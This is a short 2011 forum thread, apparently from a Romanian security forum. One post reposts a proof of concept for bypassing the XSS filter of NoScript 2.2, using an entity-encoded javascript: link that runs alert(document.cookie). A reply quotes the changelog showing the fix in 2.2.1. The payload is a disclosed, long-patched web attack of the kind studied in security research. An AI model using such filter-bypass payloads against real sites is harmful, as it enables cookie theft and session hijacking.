Nytro Posted November 28, 2011 Report Posted November 28, 2011 NoScript 2.2 XSS Filter Bypass// NoScript 2.2 XSS Filter Bypass (fixed with 2.2.1rc1 and 2.2.1rc2 literally minutes after reporting)// URLtest.php?xss=<a href="javascript%26colon;'%26percnt;3cscript%26percnt;3ealert%26lpar;document.cookie%26rpar;%26percnt;3c/script%26percnt;3e'">CLICKME// Result<a href="javascript:'%3cscript%3ealert(document.cookie)%3c/script%3e'">CLICKME// After clickjavascript:'<script>alert(document.cookie)</script>'// JS URI runs in context of the referrer - cookie access (and more) is possibleAuthor: I don't know...Sursa: http://pastebin.com/raw.php?i=W1q6BciY Quote
Flubber Posted November 29, 2011 Report Posted November 29, 2011 (edited) Fixed in 2.2.1:NoScript CHANGELOG [[B][COLOR=green]+[/COLOR][/B]] new feature, [[B][COLOR=red]x[/COLOR][/B]] bug fix, [-] removed feature, [=] repackaging or cosmetic change v [B]2.2.1[/B]==========================================================================[COLOR=green][B]+[/B][/COLOR] [Locale] Updated he-il (thanks baryoni)[COLOR=red][B]x[/B][/COLOR] [ClearClick] Fixed incompatibility with the FoxTab add-onv [B]2.2.1rc2[/B]==========================================================================[COLOR=green][B]+[/B][/COLOR] [XSS] Deeper decoding on sanitization (thanks .mario for reporting)v [B]2.2.1rc1[/B]==========================================================================[COLOR=green][B]+[/B][/COLOR] [XSS] More accurate recursive decoding (thanks .mario for reporting)Adaugare: N-am vazut in raw-ul de pe pastebin ca s-a specificat, scuzati. Edited November 29, 2011 by Flubber sorry Quote
